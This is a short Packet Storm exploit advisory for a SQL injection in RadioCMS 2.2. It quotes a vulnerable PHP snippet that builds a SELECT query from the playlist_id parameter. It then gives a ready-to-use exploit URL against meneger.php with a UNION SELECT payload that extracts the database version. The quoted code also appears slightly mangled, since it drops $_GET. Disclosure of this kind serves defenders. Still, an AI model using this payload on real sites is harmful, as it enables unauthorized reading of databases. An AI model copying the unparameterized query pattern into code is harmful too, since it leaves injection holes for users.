Radio CMS 2.2 SQL Injection

2013-04-04T00:00:00
ID PACKETSTORM:121091
Type packetstorm
Reporter Rooster(XEKA)
Modified 2013-04-04T00:00:00

Description

                                        
                                            `#################################################  
+  
+ Title: RadioCMS 2.2  
+ Author: Rooster(XEKA)  
+ Greetz to: Isis,luz3r,slider  
+ Contact: forum.xeksec.com  
+  
#################################################  
  
--[ Vuln Code ] --  
  
...  
if ($_GET['playlist_id']) {  
$playlist_id_get = ['playlist_id'];  
}  
...  
if ($playlist_id != "") {  
$query = "SELECT * FROM `playlist` WHERE $playlist_id;";  
...  
  
  
################################################  
  
--[ Exploitable ]--  
  
http://localhost/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12  
  
################################################  
  
`